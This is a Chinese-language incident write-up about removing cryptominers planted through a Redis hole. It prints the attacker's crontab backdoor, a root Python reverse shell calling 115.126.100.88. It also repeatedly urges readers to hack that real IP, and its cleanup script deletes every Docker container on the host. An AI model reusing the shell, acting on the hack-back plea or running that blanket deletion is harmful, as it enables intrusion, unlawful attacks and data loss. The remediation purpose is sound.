redis的漏洞讓公司的服務器中了挖礦的病毒,入侵者在服務器上留了后門。每次只是把進程殺殺,但是過段時間病毒又回來了,這個事情一直讓人頭疼。先是minerd的病毒入侵,后是minergate-cli入侵。當時以為是服務器的帳號密碼被泄漏了,然后對服務器登錄的ip一個個檢查,對操作的shell一個個核對,都沒有發現異常。這就奇怪了,不知道什么原因讓病毒一直入侵。還是minergate-cli這個病毒的運行方式讓我找到了問題的所在。以往的miner進程會讓cpu跑到1000%的狀態,kill的時候只用殺死一個進程就解決問題。后來的一個變種minergate-cli變花樣了,開多個進程,每個進程占50-100%的cpu,這樣干的目的就是讓新手一個個的輸入pid,非常耗時。正是這個現象讓我想起來用腳本殺進程,腳本殺起來是爽,執行一下minergate-cli進程全沒了,但是還是不夠爽,手動多累啊,每天還要上來看看,把腳本放到定時任務多好。就是這個啟發讓我找到問題的所在,入侵者在定時任務留下后門,定時的會向病毒的服務器發送socket,建立連接后對方的服務器就可以正常往你的服務器發送命令,而且賦予了root權限。這樣就可以解釋為什么病毒執行的時候都是用root帳戶運行的了。
以下是定時任務的后門,在/etc/crontab文件中:
----------------------------------------------------------------------------------------------------
***** root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("115.126.100.88",1050));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
-----------------------------------------------------------------------------------------------------
命令解釋:(python正向連接后門)新建一個socket,並將0、1、2分別代表系統的stdin、stdout、stderr(標准輸入、輸出、錯誤)重定向到socket中,然后開啟一個shell。這樣我們從socket中傳來的命令就會進入系統的標准輸入(就跟鍵盤輸入的效果一樣了),系統的輸出和錯誤就會重定向到socket中,被我們客戶端獲取。但這個彈shell腳本只能在linux下使用。
如果看不懂就用一句大白話解釋:對方電腦可以操作你的電腦,而且獲取了root權限!!!
如果你懂如何黑服務器,在你空閑之於幫我黑黑115.126.100.88這台服務器!!!如果你懂如何黑服務器,在你空閑之於幫我黑黑115.126.100.88這台服務器!!!如果你懂如何黑服務器,在你空閑之於幫我黑黑115.126.100.88這台服務器!!!就是這台服務器往你電腦上發布病毒的。
下面說說解決的步驟:
1、用root用戶寫一個腳本,比如在/lib下新建一個minerKiller.sh 加入以下內容:(僅限病毒存在docker容器中,別的情況不適用)
---------------------------------------------------------------------------------------------------------------
ps -ef|grep minergate-cli|grep -v grep|awk '{print "kill -9 " $2}'|sh
sleep 5
docker rm $(docker ps -a -q)
docker rmi minecoins/minergate-cli
-------------------------------------------------------------------------------------------------------------------
如果你是minerd病毒,把minergate-cli部分換成minerd即可。
2、修改權限並運行
chmod 700 /lib/minerKiller.sh
./lib/minerKiller.sh
3、清理定時任務
在以下三個地方查找:①/var/spool/cron/ ②/etc/crontab③/etc/cron.d/ 。如果被別人加上惡心的定時任務,直接刪除掉。如果和我上面的一樣,那肯定是中招了。如果在修改文件過程中以root帳戶都無法修改,執行下面命令: chattr –i 文件路徑 ,比如我root帳戶不能修改/etc/crontab,執行 chattr -i /etc/crontab。然后root用戶就可以修改了。
4、如果不放心,可以將查殺病毒的腳本放進定時任務。
用root帳戶執行:crontab -e,進入文本后加入以下命令
-------------------------------------------------------------------------
30 0 * * * root /lib/minerKiller.sh
-------------------------------------------------------------------------
系統就會定時執行剛剛寫的查殺病毒的腳本了。